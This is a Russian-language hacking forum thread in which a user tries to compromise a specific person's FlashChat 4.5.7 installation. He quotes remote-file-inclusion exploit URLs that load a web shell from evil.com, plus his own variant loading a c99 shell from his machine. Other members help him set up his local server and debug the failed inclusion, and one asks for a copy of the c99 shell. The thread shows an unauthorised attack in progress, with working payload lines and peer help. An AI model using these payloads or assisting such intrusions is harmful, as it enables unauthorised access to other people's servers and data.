|
Flashchat !!!
Приветствую!!!
Вобщем есть такой вопросец хотел нагнуть FlashChat v 4.5.7 нашел баг под него на складе сайта www.milw0rm.com Код: http://site.com/[script_path]/inc/cmses/aedating4CMS.php?dir[inc]=http://evil.com/shell.txt? http://site.com/[script_path]/inc/cmses/aedatingCMS2.php?dir[inc]=http://evil.com/shell.txt? http://site.com/[script_path]/inc/cmses/aedatingCMS.php?dir[inc]=http://evil.com/shell.txt? Видео данной уязвимости: http://rapidshare.de/files/31362430/Flashchat.rar.html ------------------------------------------------------------------------------------------------ Ставлю я значит себе denwer кидаю туда вебшелл с99 и прописываю вот это: http://ип_цель/chat/inc/cmses/aedating4CMS.php?dir[inc]=http://ип_мой/c99.txt? Идет запрос и шелл не хочет грузиться попробоал убрать [inc] На это вебсерв отрыгивает такое: Warning: main(y:\home\non-existent-host/inc/header.inc.php): failed to open stream: No such file or directory in y:\home\non-existent-host\chat\inc\cmses\aedating4cms.php on line 12 Warning: main(): Failed opening 'y:\home\non-existent-host/inc/header.inc.php' for inclusion (include_path='.;/usr/local/php/PEAR') in y:\home\non-existent-host\chat\inc\cmses\aedating4cms.php on line 12 Warning: main(hdb.inc.php): failed to open stream: No such file or directory in y:\home\non-existent-host\chat\inc\cmses\aedating4cms.php on line 13 Fatal error: main(): Failed opening required 'hdb.inc.php' (include_path='.;/usr/local/php/PEAR') in y:\home\non-existent-host\chat\inc\cmses\aedating4cms.php on line 13 Есть небольшой ньюанс на компе_цели как я понял стоит фаирвол который пропускает не все подряд а именно разрешенные приложения админом.. может быть в этом дело ?! Т.е его ip даже не пингуется... а как я понял баг работает по принцыпу бэкконекта и возможно фаир рубит это дело на корню.. Вобщем или я туплю или чтото не так делаю :) Пролейте свет !!!!!! Вопрос в догонку :) Честно гворя я не совсем понимаю почему в етом баге шелл должен быть в виде .txt а не в .php Не нужно ли мне случаем чтобы мой вебсерв обрабатывал .txt как скрипты php ?! |
ну вопервых денвер сначала надо настроить чтобы он смотрел в инет.
кидай в директорию c:/webservers/home/your_site/ файл ".htaccess"(с точкой. создать тебе врятли удасться а вот скопировать из custom получиться) содержанием # dnwr_ip 127.0.0.2 <-- вместо 127.0.0.2 вписывай свою ип при подключении к инету и делай ребут апача # dnwr_host custom-host # dnwr_port 80 Цитата:
Цитата:
|
Вторым постом в теме всё описывается: http://forum.antichat.ru/thread20985.html.
Не знаю что там может быть непонятного. Пробуй сразу на вебе, не мучай себя и денвер. Кстати эту багу уже почти везде закрыли. |
Цитата:
Но сомо собой я настройил апатчь чтобы он смотрел в сетку с портом 80 но все равно нехочет цеплять шелл. Но настройку я делал не через .htaccess а прописал в httpd.conf есть ли разница ?! Цитата:
|
Цитата:
|
хм. такто разницы никакой. Но поробовать стоит. Этож денвер...
|
Цитата:
echo. > .htaccess |
))) Ай блин. сам тупанул. чет даж мысли не возникало...
|
Пробовал .htaccess создавать неканает :) вобщем странно както
Возможно у него верссия подправленая хз Хотя на запрос chat/inc/cmses/aedating4CMS.php выдает вот это Warning: main(y:\home\non-existent-host/inc/header.inc.php): failed to open stream: No such file or directory in y:\home\non-existent-host\chat\inc\cmses\aedating4cms.php on line 12 Warning: main(): Failed opening 'y:\home\non-existent-host/inc/header.inc.php' for inclusion (include_path='.;/usr/local/php/PEAR') in y:\home\non-existent-host\chat\inc\cmses\aedating4cms.php on line 12 Warning: main(db.inc.php): failed to open stream: No such file or directory in y:\home\non-existent-host\chat\inc\cmses\aedating4cms.php on line 13 Fatal error: main(): Failed opening required 'db.inc.php' (include_path='.;/usr/local/php/PEAR') in y:\home\non-existent-host\chat\inc\cmses\aedating4cms.php on line 13 |
Пишет что нету такого файла или дирректории. Админ вполне мог их перенести, и изменить адреса подгружаемых файлов чата.
|
мда... как пробить где они тусят ?!
|
Скорей всего никак. Он мог их просто переименовать.
|
Мда жаль если так....хотя знаю его навыки в этом деле обычно у него все по дефолту :))
Но видать это исключение :) |
Так где пробить это верссию на офф скорей всего новая...
Поставить себе и логическим путем подумать что он там мог изменить :)) Хотя логики тут маловато будет кто его знает какое ему имя папки взбрело в голову... |
Вот что пришло в голову уязвимость скорей всего продемострирована на платной верссии чата а в free версии возможно структура папок другая ?!
Порылся чета нема этой версии :) наврно плохо ищу.. |
Эти флэшы вроде все бесплатны. По крайней мере до 4.7.0 версии.
|
Народ !!! подкиньте шелл с99 если можно билд 16 :) ато у меня бета....
|
А и на щет этой темы..
Короче че получилось поставил я себе етот чат поробовал провернуть взлом локально Вобщем шелл грузится но както странно толко титульная страница и если пробовать юзать его то выдает следущее Warning: main(o:\home\non-existent-host/inc/header.inc.php) [function.main]: failed to open stream: No such file or directory in o:\home\non-existent-host\chat\inc\cmses\aedatingcms.php on line 12 Warning: main() [function.include]: Failed opening 'o:\home\non-existent-host/inc/header.inc.php' for inclusion (include_path='.;/usr/local/php/PEAR') in o:\home\non-existent-host\chat\inc\cmses\aedatingcms.php on line 12 Notice: Undefined variable: dir in o:\home\non-existent-host\chat\inc\cmses\aedatingcms.php on line 13 [Денвер: показать возможную причину ошибки] Warning: main(db.inc.php) [function.main]: failed to open stream: No such file or directory in o:\home\non-existent-host\chat\inc\cmses\aedatingcms.php on line 13 Fatal error: main() [function.require]: Failed opening required 'db.inc.php' (include_path='.;/usr/local/php/PEAR') in o:\home\non-existent-host\chat\inc\cmses\aedatingcms.php on line 13 Я так понимаю что все дело в самой реализации денвера под винду хотя пробовал appwebserv через него такая же фигня o_O |
| Время: 22:25 |